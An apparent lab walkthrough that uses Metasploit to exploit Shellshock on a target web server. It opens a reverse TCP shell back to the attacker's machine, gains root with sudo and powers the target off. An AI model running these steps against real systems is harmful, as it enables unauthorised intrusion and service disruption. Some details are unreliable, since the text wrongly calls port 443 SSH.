Objective:
Shut down target machine using metasploit
Steps:
- run msfconsole on kali terminal using
msfconsole
- check the vulnerability of the target machine by using auxiliary scanner tool on msfconsole by typing
use auxiliary/scanner/http/apache_mod_cgi_bash_env
and type
show options
to show the options and see the requirements
- on the requirements, RHOSTS and TARGETURI needs to be filled, RHOSTS needs to be filled with the target ip address, and TARGETURI needs to be filled with /cgi-bin/status, which the terminal command runs on.type
set RHOSTS target.ip.address
to set the RHOSTS, and
set TARGETURI /cgi-bin/status
to set the TARGETURI to /cgi-bin/status
- now run
id
and
run
to see if the target is vulnerable. If the target is vulnerable, it will return the information of the target.
- Now that the target is vulnerable, we use the exploit bash on msfconsole by typing
use exploit/multi/http/apache_mod_cgi_bash_env_exec
and type
show options
to show the options and see the requirements
- repeat step 3 by fulfilling the RHOSTS and TARGETURI with target ip address and /cgi-bin/status correspondingly.
- we need to set the payload that will be sent into linux shell reverse tcp, to do so, type
set payload linux/x86/shell/reverse_tcp
- when we type
show options
it will show the payload options and field needed to be fulfilled. the LHOST and LPORT fields need to be filled with your machine ip, where the packet will be sent from, and the port of your machine, 443, the ssh. To do so, type
set LHOST your.ip.address
and
set LPORT 443
- to run and send the payload to the target machine, type
run
if the connection is successful, it will result in open a session between the your local machine and its port, for example 192.168.15.4:443 and the target machine and its port, for example 192.168.15.6:35754
we can try to check the connection by typing
ifconfig
to check whether the ip matches the one shown by msfconsole
- to shut down the target machine, type
sudo -s
to gain the privilege of the root access
to shut down the machine, type
poweroff